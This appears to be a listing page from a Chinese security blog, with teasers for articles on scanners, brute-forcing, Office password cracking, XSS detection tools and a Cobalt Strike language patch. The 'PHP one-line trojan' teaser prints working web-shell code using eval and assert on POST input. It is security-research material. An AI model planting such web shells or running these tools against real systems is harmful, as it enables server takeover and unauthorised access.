工具分享
SRCHunter一款基于python的开源扫描器
NNN4cy
目前支持的功能 1 2 3 4 5 6 7 8 9 10 11 全自动扫描: python webmain.py -a target.com --> baidu_site && port/di…
端口扫描器的几种代码实现方案
搞安全的应该都知道端口扫描在渗透测试、漏洞扫描过程中的重要性,其与URL爬虫等技术构成了漏洞扫描的第一阶段,即目标信息收集。因此能否开发出一款高效稳定的端口扫描器,往往决定了漏洞扫描器的好坏。那么说到端口扫描器,我们往往会先想到nm…
php一句话木马集合
eval.php 1 <?php @eval($_POST['cmd'])?> assert.php 1 <?php assert($_POST[cmd]);?> min_lenth.php 1 2 <…
使用hashcat破解加密office文件
首先要下载 office2john.py,支持破解的加密为office自带的加密功能,即: 使用office2john将office转换为hash: 1 python office2john.py 123.docx > has…
brut3k1t – 一款模块化的服务端暴力破解工具
项目地址:https://github.com/ex0dus-0x/brut3k1t 1. Introduction brut3k1t是一款服务端的暴力破解模块,支持多种协议的字典攻击。目前完整支持的协议有: [crayon-5b7…
xss漏洞探测工具-xssfork
xssfork简介 xssfork作为sicklescan的一个功能模块,其开发主要目的是用于检测xss漏洞。 传统的xss探测工具,一般都是采用 payload in response的方式,即在发送一次带有payload的htt…
Kali Linux信息收集之nbtscan-unixwiz
0x00 介绍 一个在本地或远程TCP/IP网络上扫描开放的NETBIOS名称服务器的命令行工具。它基于Windows系统的nbtstat工具的功能实现,但它可在许多地址上运行,而不是仅一个地址。 主页 | 仓库 作者:Steve …
Cobalt strike3.8 中文支持(Update)
0x00 简介 cobaltstrike3.10 已经出来很久了,其中最吸引人的可能就是他已经支持中文了,但是貌似很久以来都没在网上看到3.10的资源,所以就没办法,拿手上的3.8 改改将就用。 0x01 反编译 首先我们要对cob…
全自动检测xss以及批量化全网扫描工具
“Scripter”(又名XSSer)是一个自动框架,用于在基于Web的应用程序中检测,利用和报告XSS漏洞。 下载地址: git clone https://github.com/epsylon/xsser 安装: XSSer在许…
借鉴开源框架自研日志收集系统
项目背景 公司项目需要将分布在多台机器中的日志统一收集管理。笔者先后使用logstash,flume等开源项目。并最终自研一套基于Java语言的日志收集系统 Bloodhound。以下从项目关注的角度对开源系统与自研进行分析。 1 …